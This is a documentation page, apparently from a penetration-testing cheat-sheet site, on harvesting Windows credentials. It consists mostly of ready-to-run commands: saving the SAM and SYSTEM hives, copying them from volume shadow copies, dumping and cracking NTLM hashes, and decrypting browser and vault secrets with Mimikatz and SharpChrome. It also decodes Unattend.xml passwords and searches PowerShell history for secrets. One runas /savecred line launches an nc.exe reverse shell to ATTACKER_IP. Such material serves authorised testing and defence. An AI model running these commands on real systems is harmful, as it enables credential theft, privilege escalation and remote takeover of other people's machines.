> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Credential Harvesting

> Extracting credentials from SAM/SYSTEM, DPAPI, Credential Manager, Unattend.xml, and PowerShell history.

## SAM / SYSTEM Dump

SAM database contains local account NTLM hashes. Needs SYSTEM + SAM hives.

### Copy Registry Hives

```cmd theme={"dark"}
reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
```

### Volume Shadow Copy (If Locked)

```cmd theme={"dark"}
wmic shadowcopy call create Volume='C:\'
```

```cmd theme={"dark"}
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Windows\Temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\SYSTEM
```

### Extract Hashes (Attacker)

```bash theme={"dark"}
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
```

```bash theme={"dark"}
samdump2 SYSTEM SAM
```

### Crack NTLM Hashes

```bash theme={"dark"}
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
```

***

## DPAPI — Saved Passwords

DPAPI protects Chrome/Edge passwords, Wi-Fi keys, RDP credentials.

### Chrome/Edge Passwords

Encrypted DB location:

```
C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\%USERNAME%\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
```

### Decrypt with Mimikatz

```
dpapi::chrome /in:"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
```

### Decrypt with SharpChrome

```cmd theme={"dark"}
SharpChrome.exe logins
```

### Wi-Fi Passwords via DPAPI

```cmd theme={"dark"}
netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear
```

***

## Windows Vault / Credential Manager

### List Stored Credentials

```cmd theme={"dark"}
cmdkey /list
```

```powershell theme={"dark"}
vaultcmd /listcreds:"Windows Credentials" /all
```

### Exploit Saved Credentials (runas /savecred)

If `cmdkey /list` shows stored credentials:

```cmd theme={"dark"}
runas /savecred /user:DOMAIN\admin cmd.exe
```

```cmd theme={"dark"}
runas /savecred /user:Administrator "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
```

### Extract with Mimikatz

```
vault::cred /patch
```

***

## Unattend.xml / Sysprep Files

Deployment files often contain plaintext or base64-encoded passwords.

### Common Locations

```cmd theme={"dark"}
dir /s /b C:\unattend.xml C:\Unattend.xml 2>nul
dir /s /b C:\sysprep.xml C:\sysprep.inf 2>nul
```

```powershell theme={"dark"}
Get-ChildItem -Path C:\ -Recurse -Include unattend.xml,sysprep.xml,sysprep.inf,Unattended.xml -ErrorAction SilentlyContinue
```

Full list of paths:

```
C:\unattend.xml
C:\Windows\Panther\unattend.xml
C:\Windows\Panther\Unattend\unattend.xml
C:\Windows\System32\sysprep\unattend.xml
C:\Windows\System32\sysprep\sysprep.xml
C:\Windows\System32\sysprep.inf
```

### Password Format in Unattend.xml

```xml theme={"dark"}
<AutoLogon>
  <Password>
    <Value>UABhAHMAcwB3AG8AcgBkADEAMgAzAA==</Value>
    <PlainText>false</PlainText>
  </Password>
  <Username>Administrator</Username>
</AutoLogon>
```

### Decode Base64 Password

```bash theme={"dark"}
echo "UABhAHMAcwB3AG8AcgBkADEAMgAzAA==" | base64 -d
```

```powershell theme={"dark"}
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("UABhAHMAcwB3AG8AcgBkADEAMgAzAA=="))
```

***

## PowerShell History

### History File Location

```powershell theme={"dark"}
(Get-PSReadlineOption).HistorySavePath
```

Default:

```
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

### Read History for All Users

```powershell theme={"dark"}
Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { Write-Output "=== $($_.FullName) ==="; Get-Content $_ }
```

### Search for Credentials

```powershell theme={"dark"}
Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { Select-String -Path $_ -Pattern "password|credential|secret|key|token|pass" -AllMatches }
```

### CMD History

```cmd theme={"dark"}
doskey /history
```
